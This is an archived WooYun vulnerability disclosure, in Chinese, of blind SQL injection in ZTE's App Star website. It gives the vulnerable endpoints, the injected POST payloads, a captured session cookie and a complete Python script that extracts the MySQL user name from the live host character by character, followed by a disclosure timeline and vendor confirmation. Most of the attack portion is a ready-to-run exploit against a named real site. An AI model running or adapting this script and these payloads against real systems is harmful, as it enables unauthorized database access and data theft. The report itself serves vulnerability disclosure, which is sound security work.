乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-27: 细节已通知厂商并且等待厂商处理中 2015-01-30: 厂商已经确认,细节仅向厂商公开 2015-02-09: 细节向核心白帽子及相关领域专家公开 2015-02-19: 细节向普通白帽子公开 2015-03-01: 细节向实习白帽子公开 2015-03-13: 细节向公众公开
中兴应用之星盲注(二)附验证脚本 两枚请审核时注意与http://www.wooyun.org/bugs/wooyun-2010-094222/的区别,参数不同, - - !
1、
url:http://www.appstar.com.cn/appstar/manage/queryAceAppShow.actionpost:appIndex=0&applimit=7&appType=0 and ascii(MID(version(),1,1))=53&isAce=1&rnd=0.12041312991641462&userType=0
参数:appType2、
URL:http://www.appstar.com.cn/appstar/manage/queryAceTemp.action post:appIndex=0&applimit=7&appType=1 and ascii(MID(version(),1,1))=53&isAce=1&rnd=0.46515097096562386&userType=1
参数:appTypecookie:
Hm_lvt_b2d6cc3870d8c6523fc919a188c8c527=1422321865,1422322129,1422322227,1422337215; JSESSIONID=8A2FFF839FD24601AB1F4AC83C8790DB; Hm_lpvt_b2d6cc3870d8c6523fc919a188c8c527=1422350109; www.appstar.com.cn.ace=4d6a41784e5441784d6a63774f5455314d413d3d3a65343562663037653936626138393134303839646630306364393466323462623a31343233353436323739303434
上图:
附脚本:
#!/usr/bin/python#coding:utf_8import httplibimport timeimport urllibimport sysimport randomheaders = {"Content-type": "application/x-www-form-urlencoded", 'Accept-Language':'zh-CN,zh;q=0.8', 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.0)', "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Connection": "close", "Cache-Control": "no-cache"}post_data = {"appIndex":'0', "applimit":'7', "userType":'0', "isAce":'1', "rnd":'0.12041312991641462' }payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')base_url = "/appstar/manage/queryAceAppShow.action"user = ''def sql(): global post_data global user cookie = raw_input("pls input your cookie:") headers["Cookie"] = cookie for i in range(1,22): for payload in payloads: getuser = "0 and ASCII(MID(user(),%d,1)) = %s" % (i,ord(payload)) post_data["appType"] = getuser postdata = urllib.urlencode(post_data) conn = httplib.HTTPConnection('www.appstar.com.cn',80,timeout=60) conn.request('POST', base_url, postdata, headers) html_contet = conn.getresponse().read().decode('utf-8')# print html_contet if html_contet.find('CPId') > 0: user += payload sys.stdout.write('\r[In Progress' + user) sys.stdout.flush() break else: print 'WAITING...' + str(random.randint(1,100))if __name__ == "__main__": sql() print '\n[Done]MySQL user is ' + user print time.strftime('%H:%M:%S', time.localtime())
危害等级:高
漏洞Rank:15
确认时间:2015-01-30 08:54
感谢~
暂无